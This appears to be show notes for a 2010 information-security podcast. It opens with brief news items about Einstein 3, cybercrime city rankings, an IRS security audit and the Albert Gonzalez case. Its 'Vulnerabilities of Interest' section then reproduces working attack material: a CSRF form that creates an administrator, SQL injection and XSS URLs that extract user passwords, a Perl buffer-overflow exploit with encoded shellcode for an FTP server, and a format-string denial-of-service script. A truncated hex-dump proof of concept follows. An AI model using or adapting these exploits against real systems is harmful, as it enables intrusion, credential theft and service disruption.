The new technologies and automated processes of Einstein 3 are improvements over Einstein 1 and 2 technology, DHS officials said. Einstein 3′s predecessors focused on intrusion detection, allowing analysts to scan records of connections to agencies. systems and use signatures to scan network traffic for cyber threats. Einstein 3 would add the ability to prevent those intrusions.

Einstein 3 also would improve information sharing by DHS’ U.S. Computer Emergency Readiness Team (US-CERT), allowing the department to automate the process for sending alerts about detected network intrusions.

News item 2:http://norton.newslinevine.com/

If you live in Seattle, Boston, Washington, D.C., San Francisco, or Raleigh, N.C., then you’re in one of the top five riskiest cities when it comes to cybercrime.

But, it’s not where you live that makes it more dangerous, it’s the type of acclivities that people in these cities tend to do, according to Symantec Internet safety advocate Marian Merritt.

“Some of the common factors for residents of those cities would be highly educated, affluent, a lot of people using tech all day long in a variety of fashions,” Merritt said. “It’s those activities that have more to do with increasing their risk than the ZIP code that they live in.”

The following are ranked the Norton Top 10 Riskiest Online Cities:

1.) Seattle
2.) Boston
3.) Washington, D.C.
4.) San Francisco
5.) Raleigh, N.C.
6.) Atlanta
7.) Minneapolis
8.) Denver
9.) Austin, Texas
10.) Portland, Ore.

News item 3: http://www.gao.gov/new.items/d10355.pdf

A study (PDF) issued last week, the Government Accountability Office states that the IRS has corrected less than one-third of the 89 security weaknesses identified in its audit of the tax agency last year.

“While IRS has corrected 28 control weaknesses and program deficiencies, 61 of them — or about 69 percent — remain unresolved or unmitigated,” the report states. “For example, IRS continued to install patches in an untimely manner and used passwords that were not complex. In addition, IRS did not always verify that remedial actions were implemented, or effectively mitigate the security weaknesses.”

Weaknesses in IRS systems “continue to jeopardize the confidentiality, integrity, and availability of financial and sensitive taxpayer information,” the GAO says. “IRS did not consistently implement controls that were intended to prevent, limit, and detect unauthorized access to its systems and information.

“For example,” the report continues, “IRS did not always (1) enforce strong password management for properly identifying and authenticating users; (2) authorize user access to permit only the access needed to perform job functions; (3) log and monitor security events on a key system; and (4) physically protect its computer resources.”

A key reason for the slow resolution of the vulnerabilities is that the IRS has not yet fully implemented its agencywide IT security program to ensure controls are appropriately designed and operating effectively, the GAO says. The agency hasn’t been conducting annual reviews of risk assessments, for example, and it hasn’t been checking to ensure contractors received security awareness training.

“Until these control weaknesses and program deficiencies are corrected, the agency remains unnecessarily vulnerable to insider threats related to the unauthorized access to and disclosure, modification, or destruction of financial and taxpayer information, as well as the disruption of system operations and services,” the report says.
News item 4: http://www.wired.com/threatlevel/2010/03/gonzalez-gov-memo/
Albert Gonzalez was sentenced to 25-years behind bars for leading a gang of cyberthieves who stole tens of millions of credit and debit card numbers from a transaction processor and several giant retail chains, federal prosecutors argued in a court filing.

“[T]he sentences would be the longest ever imposed in an identity theft case and among the longest imposed for a financial crime, which is appropriate because Gonzalez was at the center of the largest and most costly series of identity thefts in the nation’s history,” wrote Boston-based Assistant U.S. Attorney Stephen Heymann. “He knowingly victimized a group of people whose population exceeded that of many
major cities and some states.”

The government also disputed a defense claim that Gonzalez suffers from Asperger’s disorder, a mild form of autism that was grounds for a slightly reduced sentence in a previous hacking prosecution.

Gonzalez, 28, is set for sentencing next week on three indictments covering virtually every headline-making bank-card theft in recent years, including intrusions at TJX, DSW Shoe Warehouse, Office Max, Hannaford Brothers, 7-Eleven, and Heartland Payment Systems, which alone exposed magstripe data on 130 million credit and debit cards. He performed the intrusions while an informant for the Secret Service.

News item 5:  http://www.wired.com/threatlevel/2010/03/gonzalez-salary/
Convicted TJX hacker Albert Gonzalez earned $75,000 a year working undercover for the U.S. Secret Service, informing on bank card thieves before he was arrested in 2008 for running his own multimillion-dollar card-hacking operation.

The information comes from one of Gonzalez.s best friends and convicted accomplices, Stephen Watt. Watt pleaded guilty last year to creating a sniffer program that Gonzalez used to siphon millions of credit and debit card numbers from the TJX corporate network while he was working undercover for the government.

Watt said that Gonzalez was paid in cash, which is generally done to protect someone’s status as a confidential informant. The Secret Service said it would not comment on payments made to informants.

“It’s a significant amount of money to pay an informant but it’s not an outrageous amount to pay if the guy was working full time and delivering good results,” says former federal prosecutor Mark Rasch. “It’s probably the only thing he was doing – other than hacking into TJX and making millions of dollars.”

InfoSec Daily Podcast

 
ISD Podcast Episode 93 for March 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. NinkoBB is subject to a Cross-site request forgery vulnerability that would allow an attacker to change/add administrator username and/or password or add new administrator.  Version 1.3RC4 is impacted, though others may be as well.  Exploit code is available:
      #
      Author: ItSecTeam
      download from:http://ninkobb.com/releases/?NinkoBB-1.3RC4.zip
      script:NinkoBB 1.3RC4
      update:2010
      —————————————–
      xpl:
      <html>
      <head>
      <body>
      <h2>coded by ahmadbady</h2>
      <td colspan=”6″>Admin Control Panel
      - Editing User</td>
      </tr>
      <form name=”form” method=”post”
      action=”admin.php?a=users&edit=1″>
      <td >
      <dl>
      <dt>Username</dt>
      <dd><input
      class=”border” style=”width: 40%”
      value=”anything”></dd>
      <dl >
      <dt>Settings<br /><br />
      <span></span>
      <dd><input />
      banned</dd>
      <dd><input
      /> moderator</dd>
      <dd><input
      checked /> admin</dd>
      <dl >
      <dt>Email</dt>
      <dd><input type=”text”
      class=”border” style=”width: 40%”
      value=”"></dd>
      <dl >
      <dt>New Password</dt>
      <dd><input
      class=”border” style=”width: 40%”></dd>
      <dl>
      <dt>New Password Again</dt>
      <dd><input name=”npassworda”
      class=”border” style=”width: 40%”></dd>
      <dl >
      <dt> </dt>
      <dd><input type=”submit”
      name=”edit” value=”submit”></dd>
      </body>
      </html>

      ########################
      discovered by ahmadbady
      ########################

   2. Zigurrat CMS is subject to a SQL injection vulnerability because it fails to properly santize user supplied input used in a SQL query.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Example URLs  are available:

      http://www.sample.com/manager/textbox.asp?id=’

      http://www.sample.com/manager/textbox.asp?id=0′

      http://www.sample.com/manager/textbox.asp?id=%2527

      http://www.sample.com/manager/textbox.asp?id=’

      http://www.sample.com/manager/textbox.asp?id=<number> UNION SELECT*FROM VALIDTBLNAME’

   3. Quality Point NewsFeed is subject to a SQL injection and Cross Site Scripting vulnerability because it fails to properly santize user supplied input used in a SQL query.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Version 1.0 is impacted, though others may be as well.  Example URL is available:
      SQL: http://www.sample.com/NewsFeed/showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20–
      XSS: http://www.sample.com/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
   4. Flex CMS is subject to a Blind SQL injection vulnerability because it fails to properly santize user supplied input used in a SQL query.   This could allow an attacker to compromise the underlying database or completely compromise the system.  Version <= 2.5 is impacted, though others may be as well.  Example vulnerable file (index.php) :
      $CookieData = $HTTP_COOKIE_VARS[$CookieName];

      $LoggedIn = ‘n’;
      $UserLevel = 0;

      if ($CookieData != ” && $CookieData != ‘not_logged_in’) {
      list ($CookieUsername, $CookiePassword) = split(‘==’, $CookieData, 2);

      if ($CookieUsername != ” && $CookiePassword != ”) {
      $query = “select
      RecordNumber,Level,Password,DisplayName,SessionLen gth from
      `”.$Settings['DBPrefix'].”core-Users` where
      Username=’$CookieUsername’ LIMIT 1″;
      $result = mysql_query($query) or die (mysql_error());

      In the cookies sent login and pass, in such a
      login == hash_pass
      Because the variable $ CookieUsername not filtered and if magic_quotes_gpc
      = off is the opportunity to inj3ct0r

   5. eDisplay Personal FTP Server is subject to a post-authentication stack buffer overflow vulnerability. Version 1.0.0 is impacted, though others may be as well.  Exploit code is available:
      print
      “|——————————————————————|n”;
      print “| __ __|n”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |n”;
      print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |n”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |n”;
      print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |n”;
      print “||n”;
      print “|http://www.corelan.be:8800 |n”;
      print “||n”;
      print “|————————————————-[ EIP Hunters]–|nn”;
      print ” –==[ Exploit for eDisplay Personal FTP Server 1.0.0]==–n”;
      print ” Author : corelanc0d3rnn”;

      use IO::Socket;
      if ($#ARGV ne 3) {
      print ” usage: $0 <targetip> <targetport> <user>
      <password>n”;
      exit(0);
      }

      my $user=$ARGV[2];
      my $pass=$ARGV[3];

      print ” [+] Preparing payloadn”;
      #basereg edi – custom MessageBox payload
      my $sc = “w00tw00t”.
      “WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABX”.
      “P8ABuJIn98kMKn9QdEtJTTqzrNRcJUaXI54lKBQfPLKPv”.
      “VlnkqfGlLKW6THLKQngPlKP6FXpOtXD5ZSryeQ8QKO8aa”.
      “pLKPlututNkW5WLLKSdUUcHS1yznk3zvxlK1J5pwqxkZC”.
      “P7qYLKP4NkFa8ndqkOUayPkLNLNdKppt4JJaXOTMfaJgI”.
      “yxqKOKOKO7KSLwT6HPuINNkcjGTuQzKBFLK6lpKNkcj7l”.
      “faJKLKVdLKC1KXk9QTEtULSQksnRtHwYXTk9kUOyKrCXl”.
      “NpNfnxl62kXOlKOio9ok9ReUTMk3NiHKR3CowuLUtPRjH”.
      “LKKOkOiooyW5WxCXrLBLQ0KOqxFSWBVNCTU8qeT3CUT2M”.
      “XclvD6joyivQFKOsevdoyYRRpOKoXLbPMMlOw5LDdrrjH”.
      “qNKO9o9oPhTn6NfNV8phdp0dEcSBU8BLCQrNcSqxPcrOR”.
      “RSUtqKkmX1LTdtONiysrHTnVNqHUp3Xq0gK4i6N3XBGSQ”.
      “1ypnphSYsDUppaQxsTqycTEpTqxImXPLtdFrMYkQP1Zrs”.
      “b3cPQrrkOn0DqIPbpKOQEeXA”;

      #custom encoded egg hunter
      #boy I love pvefindaddr !
      # !pvefindaddr encode ascii <bytes>
      #I only had to fix bad chars
      #but we need 5C to trigger SEH at correct offset
      my $decoder=
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx2Ex5Dx55x5D”.
      “x2Dx2Dx5Dx55x5D”.
      “x2Dx30x5Ex55x5D”.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx70x2Dx5Cx6F”. #we need these 5C’s !!
      “x2Dx70x2Cx5Cx6F”. #we need these 5C’s !!
      “x2Dx71x30x5Dx71″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx45x2Ex23x56″.
      “x2Dx45x2Dx23x56″.
      “x2Dx46x30x2Ex59″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx5Bx6Cx2Dx45″.
      “x2Dx5Bx6Cx2Dx45″.
      “x2Dx5Bx6Ex2Dx45″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx41x53x37x2E”.
      “x2Dx41x53x37x2D”.
      “x2Dx42x54x37x30″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx54x37x66x45″.
      “x2Dx54x37x66x45″.
      “x2Dx56x39x66x46″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx50x3Fx39x31″.
      “x2Dx50x3Fx39x31″.
      “x2Dx51x3Fx3Bx33″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx33x2Ax67x55″.
      “x2Dx33x2Ax67x55″.
      “x2Dx34x2Ax67x55″.
      “x50″.
      “x75x58″; #jump to decoded opcode

      my $buffer = “A” x 45;
      my $pad=(“D” x 30);
      my $nseh= “x61x42x42x42″;
      my $seh=pack(‘V’,0x202D2B3C); #comctl32.ocx 0x202D2B3C
      #encoded jumpback code to jump to encoded egg hunter
      #pfew that’s a mouthful
      my $jumpback=”x50x5c”;
      $jumpback=$jumpback.”x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx55x55x55x5E”.
      “x2Dx55x55x55x5E”.
      “x2Dx56x55x56x60″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx2Ax5Cx59x54″.
      “x2Dx2Ax5Cx59x54″.
      “x2Dx2Bx5Dx59x56″.
      “x50″;
      my $rest = “A” x (1000 -
      length($buffer.$nseh.$seh.$decoder.$pad.$sc.$jumpback)-20-5);
      #align eax first
      my
      $aligneax=”x52x58x2dx35x55x55x55x2dx35x55x55x55x2dx35x55x55x55″;
      my
      $payload=$buffer.”CCCCCCCCCCCCCCCCCC”.$decoder.$pad.$nseh.$seh.&q
      uot;BBB”.$aligneax.$jumpback.$rest.$sc;
      print ” [+] Connecting to server $ARGV[0] on port $ARGV[1]n”;
      $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
      PeerPort => $ARGV[1],
      Proto => ‘tcp’);

      $ftp = <$sock> || die ” [!] *** Unable to connect ***n”;
      print ” ** $ftp”;
      print ” [+] Logging in (user $user)n”;
      print $sock “USER $userrn”;
      $ftp = <$sock>;
      print ” ** $ftp”;
      print $sock “PASS $passrn”;
      $ftp = <$sock>;
      print ” ** $ftp”;
      print ” [+] Sending payload (” . length($payload).”
      bytes)n”;
      print $sock “RMD “.$payload.”rrn”;
      print $sock “QUITrn”;

      print ” [+] Shellcode size : ” . length($sc).”
      bytesn”;

   6. Remote Help is subject to a remote denial of service vulnerability. Version 0.0.7 is impacted, though others may be as well.  Proof of Concept code is available:
      print
      “|——————————————————————|n”;
      print “| __ __|n”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |n”;
      print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |n”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |n”;
      print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |n”;
      print “||n”;
      print “|http://www.corelan.be:8800 |n”;
      print “||n”;
      print “|————————————————-[ EIP Hunters]–|nn”;
      print ” –==[ Exploit for eDisplay Personal FTP Server 1.0.0]==–n”;
      print “[+] DoS exploit for Remote Help 0.0.7 Httpn”;

      use IO::Socket;

      if ($#ARGV != 0) {
      print $#ARGV;
      print “n usage: $0 <targetip>n”;
      exit(0);
      }

      print “[+] Connecting to server $ARGV[0] on port 80nn”;

      $remote = IO::Socket::INET->new( Proto => “tcp”,
      PeerAddr => $ARGV[0],
      PeerPort => “http(80)”,
      );
      unless ($remote) { die “Cannot connect to Remote Help daemon on
      $ARGV[0]n” }
      print “[+] Connected!n”;

      #CONTROL EAX
      $payload = “/index.html” . “%x” x 90 . “A” x
      250 . “%x” x 186 .”%.999999x” x 15
      .”%.199999x” . “%nX” . “DCBA”;

      print “[+] Sending Malicious Requestn”;
      print $remote “GET $payload HTTP/1.1rn”;
      close $remote;

   7. Crimson Editor is subject to a SEH Overwrite vulnerability. Version r3.70 is impacted, though others may be as well.  Proof of Concept code is available:
      print
      “|——————————————————————|&quot;;
      print “| __ __|”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |”;
      print “| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__|”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |”;
      print “| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/|”;
      print “||”;
      print “|http://www.corelan.be:8800 |”;
      print “||”;
      print “|————————————————-[ EIP Hunters]–|”;

      header =
      “x43x6Fx6Ex66x69x67x75x72x61x74x69x6Fx6Ex20x33x2Ex37x30x20x42x65x74x61
      x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x5Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x01x00x00x00x31x46x69x78x65x64x53x79x73x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65
      x72x64x61x6Ex61x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x01x00x00x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20
      x43x6Fx6Ex73x6Fx6Cx65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x31x54x65x72x6Dx69x6Ex61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65x72x64x61x6Ex61x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00
      x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20x43x6Fx6Ex73x6Fx6C
      x65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72
      x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01
      x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x04x00x00
      x00x64x00x00x00x04x00x00x00x19x00x00x00x20x00x00x00x00x00x00x00x04x00x00x00
      x00x00x00x00x00x00x00x00x06x00x00x00x50x00x00x00x64x00x00x00x64x00x00x00x64
      x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x0Bx00
      x00x00x24x28x46x69x6Cx65x4Ex61x6Dx65x29x00x00x00x00x1Cx00x00x00x24x28x50x61
      x67x65x4Ex75x6Dx62x65x72x29x20x2Fx20x24x28x54x6Fx74x61x6Cx50x61x67x65x29x0B
      x00x00x00x24x28x43x75x72x72x44x61x74x65x29x00x00x00x00x0Ex00x00x00x43x72x69
      x6Dx73x6Fx6Ex20x45x64x69x74x6Fx72x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x00x00x00x00x01x00x00x00x03x00x00x00x62x61x6Bx00x00x00x00x03x00x00x00
      x41x53x50x07x00x00x00x41x53x50x2Ex53x50x43x07x00x00x00x41x53x50x2Ex4Bx45x59
      x05x00x00x00x42x61x73x69x63x09x00x00x00x42x41x53x49x43x2Ex53x50x43x09x00x00
      x00x42x41x53x49x43x2Ex4Bx45x59x05x00x00x00x43x2Fx43x2Bx2Bx0Dx00x00x00x43x50
      x4Cx55x53x50x4Cx55x53x2Ex53x50x43x0Dx00x00x00x43x50x4Cx55x53x50x4Cx55x53x2E
      x4Bx45x59x03x00x00x00x43x53x53x07x00x00x00x43x53x53x2Ex53x50x43x07x00x00x00
      x43x53x53x2Ex4Bx45x59x07x00x00x00x46x6Fx72x74x72x61x6Ex0Dx00x00x00x46x4Fx52
      x54x52x41x4Ex37x37x2Ex53x50x43x0Dx00x00x00x46x4Fx52x54x52x41x4Ex37x37x2Ex4B
      x45x59x04x00x00x00x48x54x4Dx4Cx08x00x00x00x48x54x4Dx4Cx2Ex53x50x43x08x00x00
      x00x48x54x4Dx4Cx2Ex4Bx45x59x04x00x00x00x4Ax61x76x61x08x00x00x00x4Ax41x56x41
      x2Ex53x50x43x08x00x00x00x4Ax41x56x41x2Ex4Bx45x59x03x00x00x00x4Ax53x50x07x00
      x00x00x4Ax53x50x2Ex53x50x43x07x00x00x00x4Ax53x50x2Ex4Bx45x59x05x00x00x00x4C
      x61x54x65x58x09x00x00x00x4Cx41x54x45x58x2Ex53x50x43x09x00x00x00x4Cx41x54x45
      x58x2Ex4Bx45x59x06x00x00x00x4Dx61x74x6Cx61x62x0Ax00x00x00x4Dx41x54x4Cx41x42
      x2Ex53x50x43x0Ax00x00x00x4Dx41x54x4Cx41x42x2Ex4Bx45x59x06x00x00x00x50x61x73
      x63x61x6Cx0Ax00x00x00x50x41x53x43x41x4Cx2Ex53x50x43x0Ax00x00x00x50x41x53x43
      x41x4Cx2Ex4Bx45x59x04x00x00x00x50x65x72x6Cx08x00x00x00x50x45x52x4Cx2Ex53x50
      x43x08x00x00x00x50x45x52x4Cx2Ex4Bx45x59x03x00x00x00x50x48x50x07x00x00x00x50
      x48x50x2Ex53x50x43x07x00x00x00x50x48x50x2Ex4Bx45x59x06x00x00x00x50x4Cx2Fx53
      x51x4Cx09x00x00x00x50x4Cx53x51x4Cx2Ex53x50x43x09x00x00x00x50x4Cx53x51x4Cx2E
      x4Bx45x59x06x00x00x00x50x79x74x68x6Fx6Ex0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex53
      x50x43x0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex4Bx45x59x06x00x00x00x54x63x6Cx2Fx54
      x6Bx09x00x00x00x54x43x4Cx54x4Bx2Ex53x50x43x09x00x00x00x54x43x4Cx54x4Bx2Ex4B
      x45x59x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x01x00x00x00x01x00x00x00x09x00x00x00x41x6Cx6Cx20x46x69x6Cx65x73x03x00
      x00x00x2Ax2Ex2Ax00x00x00x00x0Ax00x00x00x54x65x78x74x20x46x69x6Cx65x73x17x00
      x00x00x2Ax2Ex74x78x74x3Bx2Ax2Ex6Cx6Fx67x3Bx2Ax2Ex62x61x74x3Bx2Ax2Ex69x6Ex69
